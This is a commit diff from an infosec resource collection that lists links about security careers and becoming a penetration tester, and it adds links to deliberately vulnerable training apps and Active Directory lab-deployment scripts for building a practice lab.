* [So You Want To Be A H6x0r Getting Started in Cybersecurity Doug White and Russ Beauchemin ](https://www.youtube.com/watch?v=rRJKghTTics)
* [How to prepare for an infosec interview - Timothy DeBlock](http://www.timothydeblock.com/eis/135)
* [Navigating Career Choices in InfoSec - Fernando Montenegro - BSides Detroit2017](https://www.youtube.com/watch?v=yM2xCjrQSY4)
* Making career choices can be intimidating and stressful. Perhaps this presentation can help. The tidal forces affecting technology impact our careers as well. If we're not actively managing them, we're leaving decisions to chance (or to others), and may not like the outcomes. This presentation describes a framework I've used over the past few years to evaluate both ongoing job satisfaction as well as new opportunities as they appear. I'm happy with the outcomes I've obtained with it, and have used this same framework when providing advice to others, and it has been well received. Hopefully it can help others as well.
* **Becoming a Penetration Tester**
* [So you think you want to be a penetration tester - Defcon24](https://www.youtube.com/watch?v=be7bvZkgFmY)
* So, you think you want to be a penetration tester, or you already are and don't understand what the difference between you and all the other "so called" penetration testers out there. Think you know the difference between a Red Team, Penetration Test and a Vulnerability assessment? Know how to write a report your clients will actually read and understand? Can you leverage the strengths of your team mates to get through tough roadblocks, migrate, pivot, pwn and pillage? No? well this talk is probably for you then! We will go through the fascinating, intense and often crazily boring on-site assessment process. Talk about planning and performing Red Teams, how they are different, and why they can be super effective and have some fun along the way. I'll tell you stories that will melt your face, brain and everything in between. Give you the answers to all of your questions you never knew you had, and probably make you question your life choices. By the end of this session you will be ready to take your next steps into the job you've always wanted, or know deep inside that you should probably look for something else. There will be no judgment or shame, only information, laughter and fun.
* [Hold my Red Bull Undergraduate Red Teaming Jonathan Gaines](https://www.youtube.com/watch?v=9vgpqRzuvLk)
* [How to become a pentester - Corelan](https://www.corelan.be/index.php/2015/10/13/how-to-become-a-pentester/)
* [Attacking Big Business](https://www.cyberis.co.uk/blog/attacking-big-business)
* **General**
* [Mozilla Enterprise Information Security](https://infosec.mozilla.org/)


+ 13
- 0
Draft/Building A Pentest Lab.md View File

@ -13,6 +13,7 @@
-----
### <a name="general"></a>General
* [Install AD DS using Powershell](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/deploy/install-active-directory-domain-services--level-100-#BKMK_PS)
@ -52,6 +53,14 @@
* [Vulhub - Some Docker-Compose files for vulnerabilities environment](https://github.com/vulhub/vulhub)
* [exploit_me](https://github.com/bkerler/exploit_me)
* Very vulnerable ARM application (CTF style exploitation tutorial for ARM, but portable to other platforms)
* [OWASP Damn Vulnerabl Web Sockets](https://github.com/interference-security/DVWS)
* OWASP Damn Vulnerable Web Sockets (DVWS) is a vulnerable web application which works on web sockets for client-server communication. The flow of the application is similar to DVWA. You will find more vulnerabilities than the ones listed in the application.
* [Damn Vulnerable Web App](https://github.com/ethicalhack3r/DVWA)
* Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment.
* [Damn Small Vulnerable Web](https://github.com/stamparm/DSVW)
* Damn Small Vulnerable Web (DSVW) is a deliberately vulnerable web application written in under 100 lines of code, created for educational purposes. It supports majority of (most popular) web application vulnerabilities together with appropriate attacks.
-----
@ -61,6 +70,10 @@
* AutomatedLab is a provisioning solution and framework that lets you deploy complex labs on HyperV and Azure with simple PowerShell scripts. It supports all Windows operating systems from 2008 R2 to 2016 including Nano Server and various products like AD, Exchange, PKI, IIS, etc.
* [Automated-AD-Setup](https://github.com/OneLogicalMyth/Automated-AD-Setup)
* A PowerShell script that aims to have a fully configured domain built in under 10 minutes, but also apply security configuration and hardening.
* [Invoke-ADLabDeployer](https://github.com/outflanknl/Invoke-ADLabDeployer)
* Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams.
* [ADImporter](https://github.com/curi0usJack/ADImporter)
* When you need to simulate a real Active Directory with thousands of users you quickly find that creating realistic test accounts is not trivial. Sure enough, you can whip up a quick PowerShell one-liner that creates any number of accounts, but what if you need real first and last names? Real (existing) addresses? Postal codes matching phone area codes? I could go on. The point is that you need two things: input files with names, addresses etc. And script logic that creates user accounts from that data. This blog post provides both.